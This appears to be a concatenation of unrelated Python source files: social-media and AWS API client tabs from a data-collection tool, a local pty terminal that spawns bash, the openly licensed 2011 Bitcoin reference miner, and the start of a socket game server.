class FacebookTab(AuthTab):
def __init__(self, mainWindow=None):
super(FacebookTab, self).__init__(mainWindow, "Facebook")
# Authorization
self.auth_userauthorized = False
#Defaults
self.defaults['auth_type'] = "OAuth2"
self.defaults['scope'] = '' #user_groups
self.defaults['basepath'] = 'https://graph.facebook.com/v3.4'
self.defaults['resource'] = '/<Object ID>'
self.defaults['auth_uri'] = 'https://www.facebook.com/dialog/oauth'
self.defaults['redirect_uri'] = 'https://www.facebook.com/connect/login_success.html'
self.defaults['login_buttoncaption'] = " Login to Facebook "
# Query Box
self.initInputs()
# Pages Box
self.initPagingInputs()
self.initAuthSettingsInputs()
self.initLoginInputs(toggle=False)
self.loadDoc()
self.loadSettings()
def initAuthSettingsInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0,0,0,0)
self.authWidget.setLayout(authlayout)
self.pageIdEdit = QLineEdit()
authlayout.addRow("Page Id", self.pageIdEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Id", self.clientIdEdit)
self.scopeEdit = QLineEdit()
authlayout.addRow("Scopes",self.scopeEdit)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(FacebookTab, self).getSettings(purpose)
options['auth'] = 'param'
options['auth_prefix'] = ''
options['auth_tokenname'] = 'access_token'
if purpose != 'preset':
options['pageid'] = self.pageIdEdit.text().strip()
return options
def setSettings(self, settings ={}):
settings = super(FacebookTab, self).setSettings(settings)
if 'pageid' in settings:
self.pageIdEdit.setText(settings.get('pageid'))
return settings
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
raise Exception('You are not authorized, login please!')
if options.get('access_token','') == '':
raise Exception('Access token is missing, login please!')
self.connected = True
self.speed = options.get('speed',None)
self.timeout = options.get('timeout', 15)
self.maxsize = options.get('maxsize', 5)
session_no = options.get('threadnumber', 0)
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
# # Abort condition for time based pagination
# since = options['params'].get('since', False)
# if (since != False):
# since = dateutil.parser.parse(since, yearfirst=True, dayfirst=False)
# since = int((since - datetime(1970, 1, 1)).total_seconds())
# Abort condition: maximum page count
for page in range(options.get('currentpage', 0), options.get('pages', 1)):
# Save page
options['currentpage'] = page
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if options['logrequests']:
logpath = self.getLogURL(urlpath, urlparams, options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
# data
options['querytime'] = str(datetime.now())
data, headers, status = self.request(session_no,urlpath, urlparams)
options['ratelimit'] = False
options['querystatus'] = status
# rate limit info
if 'x-app-usage' in headers:
appusage = json.loads(headers['x-app-usage'])
appusage = appusage.get('call_count', 'Undefined')
if appusage > 0:
options['info'] = {'x-app-usage': "{} percent of app level rate limit reached.".format(appusage)}
if (status != "fetched (200)"):
msg = getDictValue(data,"error.message")
code = getDictValue(data,"error.code")
logMessage("Error '{0}' for {1} with message {2}.".format(status, nodedata['objectid'], msg))
# see https://developers.facebook.com/docs/graph-api/using-graph-api
# see https://developers.facebook.com/docs/graph-api/advanced/rate-limiting/
if (code in ['4','17','32','613']) and (status in ['error (400)', 'error (403)']):
options['ratelimit'] = True
else:
options['ratelimit'] = False
logData(data, options, headers)
if logProgress is not None:
logProgress({'page':page+1})
# paging
options = self.updatePagingOptions(data, options)
if options is None:
break
# # abort time based pagination
# until = params.get('until', False)
# if (since != False) and (until != False) and (int(until) < int(since)):
# break
if not self.connected:
break
@Slot()
def doLogin(self, session_no = 0):
try:
#use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
scope= self.scopeEdit.text() if self.scopeEdit.text() != "" else self.defaults.get('scope','')
url = self.defaults['auth_uri'] +"?client_id=" + clientid + "&redirect_uri="+self.defaults['redirect_uri']+"&response_type=token&scope="+scope+"&display=popup"
caption = "Facebook Login Page"
self.showLoginWindow(caption, url)
except Exception as e:
QMessageBox.critical(self, "Login canceled",str(e),QMessageBox.StandardButton.Ok)
def getUserId(self, token):
data, headers, status = self.request(
None, self.basepathEdit.currentText().strip() +
'/me?fields=id&access_token=' + token)
if status != 'fetched (200)':
return None
return data.get('id')
@Slot(QUrl)
def onLoginWindowChanged(self, url):
if "#access_token" in url.toString():
try:
url = urllib.parse.urlparse(url.toString(),allow_fragments=True)
fragment = urllib.parse.parse_qs(url.fragment)
token = fragment.get('access_token').pop()
# Get user ID
if self.auth_preregistered:
userid = self.getUserId(token)
if userid is None:
raise Exception("Could not retrieve user ID. Check settings and try again.")
self.authorizeUser(userid)
if not self.auth_userauthorized:
raise Exception("You are not registered at Facepager.")
# Get page access token
pageid = self.pageIdEdit.text().strip()
if pageid != '':
data, headers, status = self.request(None, self.basepathEdit.currentText().strip()+'/'+pageid+'?fields=access_token&scope=pages_show_list&access_token='+token)
if status != 'fetched (200)':
raise Exception("Could not authorize for page. Check page ID in the settings.")
token = data.get('access_token','')
# Set token
self.tokenEdit.setText(token)
except Exception as e:
QMessageBox.critical(self,"Login error",
str(e),QMessageBox.StandardButton.Ok)
self.closeLoginWindow()
class AmazonTab(AuthTab):
# see YoutubeTab for keys in the options-parameter
def __init__(self, mainWindow=None, name='Amazon'):
super(AmazonTab, self).__init__(mainWindow, name)
self.defaults['region'] = 'us-east-1' # 'eu-central-1'
self.defaults['service'] = 's3'
self.defaults['format'] = 'xml'
# Standard inputs
self.initInputs()
# Header, Verbs
self.initHeaderInputs()
self.initVerbInputs()
self.initUploadFolderInput()
# Extract input
self.initResponseInputs(True)
# Pages Box
self.initPagingInputs(True)
# Login inputs
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
def initLoginInputs(self):
# token and login button
loginwidget = QWidget()
loginlayout = QHBoxLayout()
loginlayout.setContentsMargins(0, 0, 0, 0)
loginwidget.setLayout(loginlayout)
self.accesskeyEdit = QLineEdit()
self.accesskeyEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.accesskeyEdit)
loginlayout.addWidget(QLabel('Secret Key'))
self.secretkeyEdit = QLineEdit()
self.secretkeyEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.secretkeyEdit)
loginlayout.addWidget(QLabel('Service'))
self.serviceEdit = QLineEdit()
loginlayout.addWidget(self.serviceEdit)
loginlayout.addWidget(QLabel('Region'))
self.regionEdit = QLineEdit()
loginlayout.addWidget(self.regionEdit)
self.extraLayout.addRow("Access Key", loginwidget)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(AmazonTab, self).getSettings(purpose)
options['auth'] = 'disable'
#options['format'] = self.defaults.get('format', '')
options['service'] = self.serviceEdit.text().strip() if self.serviceEdit.text() != "" else self.defaults.get('service', '')
options['region'] = self.regionEdit.text().strip() if self.regionEdit.text() != "" else self.defaults.get(
'region', '')
if purpose != 'preset':
options['secretkey'] = self.secretkeyEdit.text().strip() #if self.secretkeyEdit.text() != "" else self.defaults.get('auth_uri', '')
options['accesskey'] = self.accesskeyEdit.text().strip() #if self.accesskeyEdit.text() != "" else self.defaults.get('redirect_uri', '')
return options
def setSettings(self, settings = {}):
settings = super(AmazonTab, self).setSettings(settings)
if 'secretkey' in settings:
self.secretkeyEdit.setText(settings.get('secretkey'))
if 'accesskey' in settings:
self.accesskeyEdit.setText(settings.get('accesskey'))
self.serviceEdit.setText(settings.get('service'))
self.regionEdit.setText(settings.get('region'))
return settings
# Get authorization header
# See https://docs.aws.amazon.com/de_de/general/latest/gr/sigv4-signed-request-examples.html
def signRequest(self, urlpath, urlparams, headers, method, payload, options):
# Access keys
access_key = options.get('accesskey', '')
secret_key = options.get('secretkey', '')
region = options.get('region', '')
service = options.get('service', '')
if access_key == '' or secret_key == '':
raise Exception('Access key or secret key is missing, please fill the input fields!')
# Key derivation functions. See:
# http://docs.aws.amazon.com/general/latest/gr/signature-v4-examples.html#signature-v4-examples-python
def sign(key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
def getSignatureKey(key, dateStamp, regionName, serviceName):
kDate = sign(('AWS4' + key).encode('utf-8'), dateStamp)
kRegion = sign(kDate, regionName)
kService = sign(kRegion, serviceName)
kSigning = sign(kService, 'aws4_request')
return kSigning
timenow = datetime.utcnow()
amzdate = timenow.strftime('%Y%m%dT%H%M%SZ')
datestamp = timenow.strftime('%Y%m%d') # Date w/o time, used in credential scope
# Create canonical URI--the part of the URI from domain to query string
urlcomponents = urllib.parse.urlparse(urlpath)
canonical_uri = '/' if urlcomponents.path == '' else urlcomponents.path
# Create the canonical query string. In this example (a GET request),
# request parameters are in the query string. Query string values must
# be URL-encoded (space=%20). The parameters must be sorted by name.
# For this example, the query string is pre-formatted in the request_parameters variable.
urlparams = {} if urlparams is None else urlparams
canonical_querystring = OrderedDict(sorted(urlparams.items()))
canonical_querystring = urllib.parse.urlencode(canonical_querystring)
# Create the canonical headers and signed headers. Header names
# must be trimmed and lowercase, and sorted in code point order from
# low to high. Note that there is a trailing \n.
canonical_headers = {
'host': urlcomponents.hostname,
'x-amz-date': amzdate
}
if headers is not None:
canonical_headers.update(headers)
canonical_headers = {k.lower(): v for k, v in list(canonical_headers.items())}
canonical_headers = OrderedDict(sorted(canonical_headers.items()))
canonical_headers_str = "".join(
[key + ":" + value + '\n' for (key, value) in canonical_headers.items()])
# Create the list of signed headers. This lists the headers
# in the canonical_headers list, delimited with ";" and in alpha order.
# Note: The request can include any headers; canonical_headers and
# signed_headers lists those that you want to be included in the
# hash of the request. "Host" and "x-amz-date" are always required.
signed_headers = ';'.join(list(canonical_headers.keys()))
# Create payload hash (hash of the request body content). For GET
# requests, the payload is an empty string ("").
payload = b'' if payload is None else payload
if isinstance(payload, BufferReader):
payload_buffer = payload
payload = payload_buffer.read()
payload_buffer.rewind()
#payload = payload.decode('utf-8')
payload_hash = hashlib.sha256(payload).hexdigest()
# Combine elements to create canonical request
canonical_request = method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers_str + '\n' + signed_headers + '\n' + payload_hash
# Match the algorithm to the hashing algorithm you use, either SHA-1 or
# SHA-256 (recommended)
algorithm = 'AWS4-HMAC-SHA256'
credential_scope = datestamp + '/' + region + '/' + service + '/' + 'aws4_request'
string_to_sign = algorithm + '\n' + amzdate + '\n' + credential_scope + '\n' + hashlib.sha256(
canonical_request.encode('utf-8')).hexdigest()
# Create the signing key using the function defined above.
signing_key = getSignatureKey(secret_key, datestamp, region, service)
# Sign the string_to_sign using the signing_key
signature = hmac.new(signing_key, (string_to_sign).encode('utf-8'), hashlib.sha256).hexdigest()
# The signing information can be either in a query string value or in
# a header named Authorization. This code shows how to use a header.
# Create authorization header and add to request headers
authorization_header = algorithm + ' ' + 'Credential=' + access_key + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature
# The request can include any headers, but MUST include "host", "x-amz-date",
# and (for this scenario) "Authorization". "host" and "x-amz-date" must
# be included in the canonical_headers and signed_headers, as noted
# earlier. Order here is not significant.
# Python note: The 'host' header is added automatically by the Python 'requests' library.
headers.update({'x-amz-date': amzdate,
'x-amz-content-sha256': payload_hash,
# 'x-amz-content-sha256':'UNSIGNED-PAYLOAD',
'Authorization': authorization_header
# 'Accepts': 'application/json'
})
return (headers)
class TwitterTab(AuthTab):
def __init__(self, mainWindow=None):
super(TwitterTab, self).__init__(mainWindow, "Twitter")
# Authorization
self.auth_userauthorized = False
# Defaults
self.defaults['basepath'] = 'https://api.twitter.com/1.1'
self.defaults['resource'] = '/search/tweets'
self.defaults['params'] = {'q': '<Object ID>'}
#self.defaults['extension'] = ".json"
self.defaults['auth_type'] = 'OAuth1'
self.defaults['access_token_url'] = 'https://api.twitter.com/oauth/access_token'
self.defaults['authorize_url'] = 'https://api.twitter.com/oauth/authorize'
self.defaults['request_token_url'] = 'https://api.twitter.com/oauth/request_token'
self.defaults['login_window_caption'] = 'Twitter Login Page'
# Query and Parameter Box
self.initInputs()
self.initPagingInputs()
self.initAuthSetupInputs()
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
def initLoginInputs(self):
# Login-Boxes
loginlayout = QHBoxLayout()
self.tokenEdit = QLineEdit()
self.tokenEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.tokenEdit)
loginlayout.addWidget(QLabel("Access Token Secret"))
self.tokensecretEdit = QLineEdit()
self.tokensecretEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.tokensecretEdit)
self.authButton = QPushButton('Settings', self)
self.authButton.clicked.connect(self.editAuthSettings)
loginlayout.addWidget(self.authButton)
self.loginButton = QPushButton(" Login to Twitter ", self)
self.loginButton.clicked.connect(self.doLogin)
loginlayout.addWidget(self.loginButton)
# Add to main-Layout
self.extraLayout.addRow("Access Token", loginlayout)
def initAuthSetupInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0, 0, 0, 0)
self.authWidget.setLayout(authlayout)
self.authTypeEdit= QComboBox()
self.authTypeEdit.addItems(['OAuth1', 'OAuth2 Client Credentials'])
authlayout.addRow("Authentication type", self.authTypeEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Consumer Key", self.clientIdEdit)
self.clientSecretEdit = QLineEdit()
self.clientSecretEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Consumer Secret", self.clientSecretEdit)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(TwitterTab, self).getSettings(purpose)
if options['auth_type'] == 'OAuth2 Client Credentials':
options['auth_uri'] = 'https://api.twitter.com/oauth2/token/'
options['auth'] = 'header'
options['auth_prefix'] = 'Bearer '
options['auth_tokenname'] = "Authorization"
return options
def getUserId(self, session):
# Send request
response = session.request('GET', 'https://api.twitter.com/1.1/account/settings.json', timeout=self.timeout)
if not response.ok :
return None
data = response.json() if response.text != '' else []
return getDictValueOrNone(data, 'screen_name')
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
raise Exception('You are not authorized, login please!')
self.connected = True
self.speed = options.get('speed', None)
self.timeout = options.get('timeout', 15)
self.maxsize = options.get('maxsize', 5)
session_no = options.get('threadnumber',0)
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
for page in range(options.get('currentpage', 0), options.get('pages', 1)):
# Save page
options = deepcopy(options)
options['currentpage'] = page
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if options['logrequests']:
logpath = self.getLogURL(urlpath, urlparams, options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
# data
data, headers, status = self.request(session_no, urlpath, urlparams, requestheaders)
options['querytime'] = str(datetime.now())
options['querystatus'] = status
options['ratelimit'] = (status == "error (429)")
# rate limit info
if 'x-rate-limit-remaining' in headers:
options['info'] = {'x-rate-limit-remaining': "{} requests remaining until rate limit".format(
headers['x-rate-limit-remaining'])}
logData(data, options, headers)
if logProgress is not None:
logProgress({'page': page + 1})
# Pagination
paging = self.updatePagingOptions(data, options)
# paging with next_results; Note: Do not rely on the search_metadata information,
# sometimes the next_results param is missing, this is a known bug
# applies to /search/tweets
if (paging is None) and isinstance(data, dict) and hasDictValue(data, "search_metadata.next_results"):
paging = options
url, params = self.parseURL(getDictValue(data, "search_metadata.next_results", False))
options['url'] = urlpath
options['params'] = params
# Workaround for Twitter bug (carry on tweet_mode=extended)
if 'tweet_mode' in urlparams:
options['params']['tweet_mode'] = urlparams['tweet_mode']
if paging is not None:
options = paging
else:
break
if not self.connected:
break
class TwitterStreamingTab(TwitterTab):
def __init__(self, mainWindow=None):
super(TwitterTab, self).__init__(mainWindow, "Twitter Streaming")
# Authorization
self.auth_userauthorized = False
self.defaults['auth_type'] = 'OAuth1'
self.defaults['access_token_url'] = 'https://api.twitter.com/oauth/access_token'
self.defaults['authorize_url'] = 'https://api.twitter.com/oauth/authorize'
self.defaults['request_token_url'] = 'https://api.twitter.com/oauth/request_token'
self.defaults['login_window_caption'] = 'Twitter Login Page'
self.defaults['basepath'] = 'https://stream.twitter.com/1.1'
self.defaults['resource'] = '/statuses/filter'
self.defaults['params'] = {'track': '<Object ID>'}
#self.defaults['extension'] = ".json"
self.defaults['key_objectid'] = 'id'
self.defaults['key_nodedata'] = None
# Query Box
self.initInputs()
self.initAuthSetupInputs()
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
self.timeout = 30
self.connected = False
def stream(self, session_no=0, path='', args=None, headers=None):
self.connected = True
self.retry_counter=0
self.last_reconnect=QDateTime.currentDateTime()
try:
session = self.initSession(session_no)
def _send():
self.last_reconnect = QDateTime.currentDateTime()
while self.connected:
try:
if headers is not None:
response = session.post(path, params=args,
headers=headers,
timeout=self.timeout,
stream=True)
else:
response = session.get(path, params=args, timeout=self.timeout,
stream=True)
except requests.exceptions.Timeout:
raise Exception('Request timed out.')
else:
if response.status_code != 200:
if self.retry_counter<=5:
self.logMessage("Reconnecting in 3 Seconds: " + str(response.status_code) + ". Message: "+ str(response.content))
time.sleep(3)
if self.last_reconnect.secsTo(QDateTime.currentDateTime())>120:
self.retry_counter = 0
_send()
else:
self.retry_counter+=1
_send()
else:
#self.connected = False
self.disconnectSocket()
raise Exception("Request Error: " + str(response.status_code) + ". Message: "+str(response.content))
return response
while self.connected:
response = _send()
if response:
status = 'fetched' if response.ok else 'error'
status = status + ' (' + str(response.status_code) + ')'
headers = dict(list(response.headers.items()))
for line in response.iter_lines():
if not self.connected:
break
if line:
try:
data = json.loads(line)
except ValueError: # pragma: no cover
raise Exception("Unable to decode response, not valid JSON")
else:
yield data, headers, status
else:
break
response.close()
except AttributeError:
#This exception is thrown when canceling the connection
#Only re-raise if not manually canceled
if self.connected:
raise
finally:
self.connected = False
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
raise Exception('You are not authorized, login please!')
if not ('url' in options):
urlpath = options["basepath"] + options["resource"] + options.get('extension', '')
urlpath, urlparams, templateparams = self.getURL(urlpath, options["params"], nodedata, options)
else:
urlpath = options['url']
urlparams = options["params"]
if options['logrequests']:
logpath = self.getLogURL(urlpath, urlparams, options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
self.timeout = options.get('timeout',30)
self.maxsize = options.get('maxsize', 5)
# data
session_no = options.get('threadnumber',0)
for data, headers, status in self.stream(session_no, path=urlpath, args=urlparams):
# data
options['querytime'] = str(datetime.now())
options['querystatus'] = status
logData(data, options, headers)
class YoutubeTab(AuthTab):
def __init__(self, mainWindow=None):
super(YoutubeTab, self).__init__(mainWindow, "YouTube")
# Authorization
self.auth_userauthorized = False
# Defaults
self.defaults['auth_type'] = "OAuth2 External"
self.defaults['auth_uri'] = 'https://accounts.google.com/o/oauth2/auth'
self.defaults['token_uri'] = "https://accounts.google.com/o/oauth2/token"
self.defaults['redirect_uri'] = 'https://localhost'
self.defaults['scope'] = "https://www.googleapis.com/auth/youtube https://www.googleapis.com/auth/youtube.readonly https://www.googleapis.com/auth/youtube.force-ssl"
self.defaults['response_type'] = "code"
self.defaults['login_buttoncaption'] = " Login to Google "
self.defaults['login_window_caption'] = "YouTube Login Page"
self.defaults['auth'] = 'param'
self.defaults['basepath'] = "https://www.googleapis.com/youtube/v3"
self.defaults['resource'] = '/search'
self.defaults['params'] = {'q':'<Object ID>','part':'snippet','maxResults':'50'}
# Standard inputs
self.initInputs()
# Pages Box
self.initPagingInputs()
# Login inputs
self.initAuthSetupInputs()
self.initLoginInputs(False)
self.loadDoc()
self.loadSettings()
def initAuthSetupInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0,0,0,0)
self.authWidget.setLayout(authlayout)
self.authTypeEdit= QComboBox()
self.authTypeEdit.addItems(['OAuth2', 'OAuth2 External','API key'])
authlayout.addRow("Authentication type", self.authTypeEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Id", self.clientIdEdit)
self.clientSecretEdit = QLineEdit()
self.clientSecretEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Secret", self.clientSecretEdit)
self.scopeEdit = QLineEdit()
authlayout.addRow("Scopes",self.scopeEdit)
def getUserId(self, token):
data, headers, status = self.request(
None, 'https://www.googleapis.com/youtube/v3/channels?mine=true&access_token='+token)
if status != 'fetched (200)':
return None
return getDictValueOrNone(data,'items.0.id')
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(YoutubeTab, self).getSettings(purpose)
if options.get('auth_type') == 'API key':
options['auth'] = 'param'
options['auth_prefix'] = ''
options['auth_tokenname'] = 'key'
else: # OAuth2
options['auth'] = 'header'
options['auth_prefix'] = 'Bearer '
options['auth_tokenname'] = 'Authorization'
return options
# https://stackoverflow.com/questions/10123929/python-requests-fetch-a-file-from-a-local-url
class LocalFileAdapter(requests.adapters.BaseAdapter):
"""Protocol Adapter to allow Requests to GET file:// URLs
@todo: Properly handle non-empty hostname portions.
"""
@staticmethod
def _chkpath(method, path):
"""Return an HTTP status for the given filesystem path."""
if method.lower() in ('put', 'delete'):
return 501, "Not Implemented" # TODO
elif method.lower() not in ('get', 'head'):
return 405, "Method Not Allowed"
elif os.path.isdir(path):
return 400, "Path Not A File"
elif not os.path.isfile(path):
return 404, "File Not Found"
elif not os.access(path, os.R_OK):
return 403, "Access Denied"
else:
return 200, "OK"
def send(self, req, **kwargs): # pylint: disable=unused-argument
"""Return the file specified by the given request
@type req: C{PreparedRequest}
@todo: Should I bother filling `response.headers` and processing
If-Modified-Since and friends using `os.stat`?
"""
path = os.path.normcase(os.path.normpath(url2pathname(req.path_url)))
response = requests.Response()
response.status_code, response.reason = self._chkpath(req.method, path)
if response.status_code == 200 and req.method.lower() != 'head':
try:
response.raw = open(path, 'rb')
response.encoding = cchardet.detect(response.content)['encoding']
except (OSError, IOError) as err:
response.status_code = 500
response.reason = str(err)
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
response.request = req
response.connection = self
return response
def close(self):
pass
class DataTooBigError(Exception):
pass
|
main.py
|
#!/usr/bin/env python3
import os
import sys
import select
import termios
import copy
from threading import Lock, Thread
from terminal import Terminal
def io_func(tty):
while True:
rlist, wlist, xlist = select.select([sys.stdin, tty.tty_fd], [], [])
if tty.tty_fd in rlist:
out = tty.read(1000)
sys.stdout.buffer.write(out)
sys.stdout.flush()
if sys.stdin in rlist:
# XXX: ***SLIGHTLY*** inefficient
c = sys.stdin.buffer.read(1)
tty.write(c)
def main():
orig_tcattr = termios.tcgetattr(sys.stdin)
new_tcattr = copy.deepcopy(orig_tcattr)
with Terminal() as tty:
print('-> TTY name: `{}`'.format(tty.tty_name))
print('-> Spawning a shell')
pid = tty.spawn(['/usr/bin/env', '--unset=PS1', '/usr/bin/bash', '--norc', '--noprofile'])
print('-> Starting io thread')
io_thread = Thread(target=io_func, args=[tty], daemon=True)
io_thread.start()
os.waitpid(pid, 0)
if __name__ == '__main__':
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6310
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
server.py
|
import socket
from threading import Thread
SERVER = None
PORT = None
IP_ADDRESS = None
CLIENTS = {}
# Boilerplate Code
def handleClient(player_socket,player_name):
global CLIENTS
# Sending Initial message
playerType = CLIENTS[player_name]["player_type"]
if(playerType== 'player1'):
CLIENTS[player_name]['turn'] = True
player_socket.send(str({'player_type' : CLIENTS[player_name]["player_type"] , 'turn': CLIENTS[player_name]['turn'], 'player_name' : player_name }).encode())
else:
CLIENTS[player_name]['turn'] = False
player_socket.send(str({'player_type' : CLIENTS[player_name]["player_type"] , 'turn': CLIENTS[player_name]['turn'], 'player_name' : player_name }).encode())
while True:
try:
message = player_socket.recv(2048)
if(message):
for cName in CLIENTS:
cSocket = CLIENTS[cName]["player_socket"]
cSocket.send(message)
except:
pass
def acceptConnections():
global CLIENTS
global SERVER
while True:
player_socket, addr = SERVER.accept()
